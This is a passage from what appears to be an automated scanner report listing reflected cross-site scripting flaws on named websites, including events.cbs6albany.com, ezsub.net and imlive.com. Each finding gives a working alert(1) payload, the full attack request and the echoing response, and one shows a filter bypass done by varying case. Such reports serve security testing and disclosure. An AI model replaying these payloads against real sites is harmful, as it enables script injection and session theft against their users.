ETag: "3924344597b43dc83d23de6249cb62f1"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:14 GMT; HttpOnly
Content-Length: 16632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<script type="text/javascript">
Zvents.tracker.notifySearchView(
'',
'',
'st=eventf3295';alert(1)//c7b12d2e1bf&when=Today&ssi=0&ssrss=5&srss=11');
</script>
...[SNIP]...

4.434. http://events.cbs6albany.com/search [st parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc86f"><script>alert(1)</script>076e941308e was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=eventcc86f"><script>alert(1)</script>076e941308e&swhen=Today HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:03 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 41
ETag: "d33187b541929742d32b389b53910866"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iClRvZGF5IgtidWNrZXRGIg1sb2NhdGlvbnsQIgljaXR5IgtBbGJhbnkiC3JhZGl1c2k3Ig1sYXRpdHVkZWYaNDIuNjUxNjk5OTk5OTk5OTk4AGbPIgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYbLTczLjc1NTA5OTk5OTk5OTk5OQBNaiIRd2hlcmVfc3RyaW5nQBkiCnN0YXRlIgdOWQ%3D%3D--01e026a8bd0da083a16cbd6b21a518a127f1b784; path=/; expires=Fri, 29-Apr-2011 05:48:03 GMT; HttpOnly
Content-Length: 17541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<body id="body_eventcc86f"><script>alert(1)</script>076e941308e">
...[SNIP]...

4.435. http://events.cbs6albany.com/search [swhen parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/search

Issue detail

The value of the swhen request parameter is copied into the HTML document as plain text between tags. The payload bdbbd<script>alert(1)</script>c8e9589b31a was submitted in the swhen parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search?st=event&swhen=Todaybdbbd<script>alert(1)</script>c8e9589b31a HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:51:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 65
ETag: "fed90f622cad38580e62fb34a0edf8c2"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7DDoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiCXNlaWRpBiIIcmlkaQAiDmxhc3Rfd2hhdCIAIg5sYXN0X3doZW4iM1RvZGF5YmRiYmQ8c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ%2BYzhlOTU4OWIzMWEiC2J1Y2tldEYiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAGSIKc3RhdGUiB05Z--43d612017661ca8fd7295b131750187c403fee68; path=/; expires=Fri, 29-Apr-2011 05:51:27 GMT; HttpOnly
Content-Length: 18400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<div id="error_message">
Unrecognized date format: Todaybdbbd<script>alert(1)</script>c8e9589b31a is not recognized as a valid time. Here are some examples of times that we recognize:<ul style='padding-left:15px;'>
...[SNIP]...

4.436. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PGTP parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PGTP request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce60"><script>alert(1)</script>2ae1c00828f was submitted in the PGTP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=Afce60"><script>alert(1)</script>2ae1c00828f HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="PGTP" value="Afce60"><script>alert(1)</script>2ae1c00828f">
...[SNIP]...

4.437. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [PUBID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the PUBID request parameter is copied into the HTML document as plain text between tags. The payload 1d459<script>alert(1)</script>fb57b35142c was submitted in the PUBID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5861d459<script>alert(1)</script>fb57b35142c&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Web Ca
...[SNIP]...
<BR>
ERROR: Web Page is corrupted! Wrong PUBID=5861D459<SCRIPT>ALERT(1)</SCRIPT>FB57B35142C.<BR>
...[SNIP]...

4.438. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SBTYPE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SBTYPE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3cf9"><script>alert(1)</script>2780b4f0119 was submitted in the SBTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XXa3cf9"><script>alert(1)</script>2780b4f0119&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="SBTYPE" value="XXA3CF9"><SCRIPT>ALERT(1)</SCRIPT>2780B4F0119">
...[SNIP]...

4.439. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [SOURCE parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the SOURCE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87eb7"><script>alert(1)</script>1275777e30 was submitted in the SOURCE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET87eb7"><script>alert(1)</script>1275777e30&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">

<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1252">
<META NAME="Generator" CONTENT="">
<TITLE>Subscr
...[SNIP]...
<input type="hidden" name="SOURCE" value="INET87EB7"><SCRIPT>ALERT(1)</SCRIPT>1275777E30">
...[SNIP]...

4.440. http://ezsub.net/isapi/foxisapi.dll/main.sv.run [jt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ezsub.net
Path:	/isapi/foxisapi.dll/main.sv.run

Issue detail

The value of the jt request parameter is copied into the HTML document as plain text between tags. The payload 4972f<script>alert(1)</script>d2f01f95955 was submitted in the jt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /isapi/foxisapi.dll/main.sv.run?jt=starr_wc4972f<script>alert(1)</script>d2f01f95955&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A HTTP/1.1
Host: ezsub.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-Type: text/html

<html><body><h1>FOXISAPI call failed</h1><p><b>Progid is:</b> main.sv
<p><b>Method is:</b> run
<p><b>Parameters are:</b> jt=starr_wc4972f<script>alert(1)</script>d2f01f95955&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
<p>
...[SNIP]...

4.441. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /?2a9d8"><ScRiPt>alert(1)</ScRiPt>bf56a35d647=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=ilg0g1555xawgsnqnx3jtzbh; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1a5e720-2007-4ea7-a708-9070c86d04f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:18 GMT
Connection: close
Content-Length: 19737
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||2a9d8"><script>alert(1)</script>bf56a35d647~1');return false;">
...[SNIP]...

4.442. http://fr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b566'-alert(1)-'c7449b1e1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?4b566'-alert(1)-'c7449b1e1ba=1 HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=r3zdvd55v5kn0b55yjmnpi55; path=/; HttpOnly
Set-Cookie: spvdr=vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:19 GMT; path=/
Set-Cookie: ifr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:19 GMT
Connection: close
Content-Length: 19336
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-FR" lang="fr-FR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=fr.imlive.com&ul=/?4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&qs=4b566'-alert(1)-'c7449b1e1ba=1&iy=dallas&id=44&iu=1&vd=a1d85813-857c-4f7f-9b93-2ebdcfdaba8e';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.443. http://fr.imlive.com/waccess/ [gotopage parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fr.imlive.com
Path:	/waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 17fa1'onerror%3d'alert(1)'4373c72317b was submitted in the gotopage parameter. This input was echoed as 17fa1'onerror='alert(1)'4373c72317b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/17fa1'onerror%3d'alert(1)'4373c72317b HTTP/1.1
Host: fr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:22 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ifr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDQSQQRCSC=BMMFJIMAJCKNADIOHDLHHPAA; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 8315
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=fr.imlive.com&ul=/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://fr.imlive.com:80/webcam-login/17fa1'onerror='alert(1)'4373c72317b/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

4.444. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b12e'-alert(1)-'11d097f86af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?2b12e'-alert(1)-'11d097f86af=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=c4sah4vvtrpptgagzrlohq45; path=/; HttpOnly
Set-Cookie: spvdr=vd=47dec44d-298a-4e64-82a7-f991aeebff7d&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:21 GMT
Connection: close
Content-Length: 21274
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=gr.imlive.com&ul=/?2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&qs=2b12e'-alert(1)-'11d097f86af=1&iy=dallas&id=44&iu=1&vd=47dec44d-298a-4e64-82a7-f991aeebff7d';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

4.445. http://gr.imlive.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ff7"><script>alert(1)</script>e0815795bf3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?84ff7"><script>alert(1)</script>e0815795bf3=1 HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rw3vjgrgjrpidqai44mlul2g; path=/; HttpOnly
Set-Cookie: spvdr=vd=b549c441-750e-4a3f-9af7-09b50e1c51fb&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:17:22 GMT; path=/
Set-Cookie: igr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 14:17:22 GMT
Connection: close
Content-Length: 21675
Set-Cookie: BIGipServerlanguage.imlive.com=2215904834.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="el-GR" lang="el-GR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||84ff7"><script>alert(1)</script>e0815795bf3~1');return false;">
...[SNIP]...

4.446. http://gr.imlive.com/waccess/ [cbname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gr.imlive.com
Path:	/waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81248"><script>alert(1)</script>dd3960e35d8 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=81248"><script>alert(1)</script>dd3960e35d8&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: gr.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
